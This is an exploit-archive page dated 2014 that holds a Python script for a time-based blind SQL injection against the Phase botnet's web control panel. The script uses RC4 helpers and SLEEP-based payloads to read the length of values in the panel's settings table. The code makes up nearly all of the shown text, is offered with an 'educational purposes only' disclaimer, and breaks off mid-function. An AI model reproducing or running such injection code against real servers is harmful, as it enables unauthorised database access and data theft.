Exploits / Vulnerability Discovered : 2014-12-23 |
Type : webapps |
Platform : linux
This exploit / vulnerability Phase botnet blind sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
import requests
import time
import sys
wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number
KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification
PostData = ""
def rc4_crypt(data , key):
S = list(range(256))
j = 0
out = []
for i in range(256):
j = (j + S[i] + ord( key[i % len(key)] )) % 256
S[i] , S[j] = S[j] , S[i]
i = j = 0
for char in data:
i = ( i + 1 ) % 256
j = ( j + S[i] ) % 256
S[i] , S[j] = S[j] , S[i]
out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
return ''.join(out)
def brute_length(url, id):
for i in range(0, 30):
Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay)
ConnectUrl = url + '?i=' + Injection
start = time.time()
r = requests.post(ConnectUrl, data=PostData, headers='')
end = time.time()